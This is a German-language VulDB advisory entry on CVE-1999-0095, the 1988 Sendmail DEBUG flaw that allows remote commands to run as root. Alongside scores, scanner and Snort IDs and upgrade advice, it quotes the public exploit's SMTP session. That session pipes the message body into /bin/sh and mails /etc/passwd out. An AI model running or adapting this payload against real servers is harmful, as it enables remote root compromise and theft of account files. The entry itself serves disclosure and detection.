| CVSS Meta Temp Score | Aktueller Exploitpreis (≈) | CTI Interest Score |
|---|---|---|
| 9.4 | $0-$5k | 0.00 |
Zusammenfassung
In Berkeley Sendmail bis 5.58 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Komponente DEBUG Handler. Durch Manipulation mit unbekannten Daten kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Die Identifikation der Schwachstelle findet als CVE-1999-0095 statt. Der Angriff lässt sich über das Netzwerk starten. Darüber hinaus steht ein Exploit zur Verfügung. Diese Schwachstelle hat aufgrund ihres Hintergrunds und ihrer Rezeption eine historische Bedeutung. Es wird geraten, die betroffene Komponente zu aktualisieren.
Details
Es wurde eine sehr kritische Schwachstelle in Berkeley Sendmail bis 5.58 (Mail Server Software) gefunden. Hiervon betroffen ist eine unbekannte Funktionalität der Komponente DEBUG Handler. Durch Manipulation mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-269 vorgenommen. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit. Die Zusammenfassung von CVE lautet:
the debug command in sendmail is enabled allowing attackers to execute commands as root.Die Schwachstelle wurde am 07.11.1988 als CA-1988-01 in Form eines bestätigten Advisories (CERT.org) publiziert. Das Advisory findet sich auf cert.org. Die Identifikation der Schwachstelle wird mit CVE-1999-0095 vorgenommen. Der Angriff kann über das Netzwerk erfolgen. Zur Ausnutzung ist keine spezifische Authentisierung erforderlich. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Die Beschaffenheit der Schwachstelle lässt vermuten, dass ein Exploit momentan zu etwa USD $0-$5k gehandelt werden wird (Preisberechnung vom 27.10.2025). Diese Schwachstelle wird durch das MITRE ATT&CK als Angriffstechnik T1068 bezeichnet. Die Ausprägung dieser Schwachstelle führt zu einem gewissen historischen Interesse an ihr.
Ein öffentlicher Exploit wurde in SMTP geschrieben und schon vor und nicht nach dem Advisory veröffentlicht. Der Download des Exploits kann von exploit-db.com geschehen. Er wird als hoch funktional gehandelt. Vor einer Veröffentlichung handelte es sich 61 Tage um eine Zero-Day Schwachstelle. Während dieser Zeit erzielte er wohl etwa $5k-$25k auf dem Schwarzmarkt. Für den Vulnerability Scanner Nessus wurde am 22.08.1999 ein Plugin mit der ID 10247 (Sendmail DEBUG/WIZ Remote Command Execution) herausgegeben, womit die Existenz der Schwachstelle geprüft werden kann. Es wird der Family SMTP problems zugeordnet und im Kontext r ausgeführt. Der kommerzielle Vulnerability Scanner Qualys bietet das Plugin 74131 (Berkeley Sendmail DEBUG Vulnerability) zur Prüfung der Schwachstelle an. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
220 mail.victim.com SMTP helo attacker.com 250 Hello attacker.com, pleased to meet you. debug 200 OK mail from: </dev/null> 250 OK rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0"> 250 OK data 354 Start mail input; end with <CRLF>.<CRLF> mail [email protected] </etc/passwd . 250 OK quit 221 mail.victim.com Terminating
Ein Aktualisieren auf die Version 5.59 vermag dieses Problem zu lösen. Mit der Einstellung Disable Debug kann das Problem auch adressiert werden. Als bestmögliche Massnahme wird das Upgrade auf eine neue Version empfohlen. Angriffe können durch Snort ID 663 erkannt werden.
Unter anderem wird der Fehler auch in den Datenbanken von X-Force (125), Exploit-DB (19028), Tenable (10247), SecurityFocus (BID 1†) und OSVDB (195†) dokumentiert. Mit dieser Schwachstelle verwandte Einträge finden sich unter VDB-13666. Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Produkt
Typ
Hersteller
Name
Version
- 5.0
- 5.1
- 5.2
- 5.3
- 5.4
- 5.5
- 5.6
- 5.7
- 5.8
- 5.9
- 5.10
- 5.11
- 5.12
- 5.13
- 5.14
- 5.15
- 5.16
- 5.17
- 5.18
- 5.19
- 5.20
- 5.21
- 5.22
- 5.23
- 5.24
- 5.25
- 5.26
- 5.27
- 5.28
- 5.29
- 5.30
- 5.31
- 5.32
- 5.33
- 5.34
- 5.35
- 5.36
- 5.37
- 5.38
- 5.39
- 5.40
- 5.41
- 5.42
- 5.43
- 5.44
- 5.45
- 5.46
- 5.47
- 5.48
- 5.49
- 5.50
- 5.51
- 5.52
- 5.53
- 5.54
- 5.55
- 5.56
- 5.57
- 5.58
Lizenz
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Zuverlässigkeit: 🔍
CVSSv3
VulDB Meta Base Score: 9.8VulDB Meta Temp Score: 9.4
VulDB Base Score: 9.8
VulDB Temp Score: 9.4
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vektor | Komplexität | Authentisierung | Vertraulichkeit | Integrität | Verfügbarkeit |
|---|---|---|---|---|---|
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍
NVD Base Score: 🔍
Exploiting
Klasse: Erweiterte RechteCWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Physisch: Nein
Lokal: Nein
Remote: Ja
Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Hoch funktional
Programmiersprache: 🔍
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍
| 0-Day | freischalten | freischalten | freischalten | freischalten |
|---|---|---|---|---|
| Heute | freischalten | freischalten | freischalten | freischalten |
Nessus ID: 10247
Nessus Name: Sendmail DEBUG/WIZ Remote Command Execution
Nessus Datei: 🔍
Nessus Risiko: 🔍
Nessus Family: 🔍
Nessus Context: 🔍
OpenVAS ID: 10247
OpenVAS Name: Sendmail DEBUG
OpenVAS Datei: 🔍
OpenVAS Family: 🔍
Qualys ID: 🔍
Qualys Name: 🔍
Exploit-DB: 🔍
Threat Intelligence
Interesse: 🔍Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍
Gegenmassnahmen
Empfehlung: UpgradeStatus: 🔍
0-Day Time: 🔍
Upgrade: Sendmail 5.59
Config: Disable Debug
Snort ID: 663
Snort Message: SERVER-MAIL Sendmail rcpt to command attempt
Snort Klasse: 🔍
SourceFire IPS: 🔍
ISS Proventia IPS: 🔍
Timeline
01.08.1988 🔍01.08.1988 🔍
01.10.1988 🔍
01.10.1988 🔍
07.11.1988 🔍
22.08.1999 🔍
12.09.2002 🔍
23.10.2002 🔍
16.06.2014 🔍
27.10.2025 🔍
Quellen
Advisory: CA-1988-01Status: Bestätigt
CVE: CVE-1999-0095 (🔍)
GCVE (CVE): GCVE-0-1999-0095
GCVE (VulDB): GCVE-100-13611
X-Force: 125
SecurityFocus: 1 - Berkeley Sendmail DEBUG Vulnerability
OSVDB: 195 - Sendmail debug Arbitrary Command Execution
Vulnerability Center: 209 - SendMail Debug Allows Command Execution, High
scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍
Eintrag
Erstellt: 16.06.2014 14:34Aktualisierung: 27.10.2025 20:00
Anpassungen: 16.06.2014 14:34 (82), 07.05.2019 10:51 (9), 11.11.2024 13:27 (16), 03.04.2025 03:37 (1), 27.10.2025 20:00 (2)
Komplett: 🔍
Cache ID: 216:FBB:103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Bisher keine Kommentare. Sprachen: de + en.
Bitte loggen Sie sich ein, um kommentieren zu können.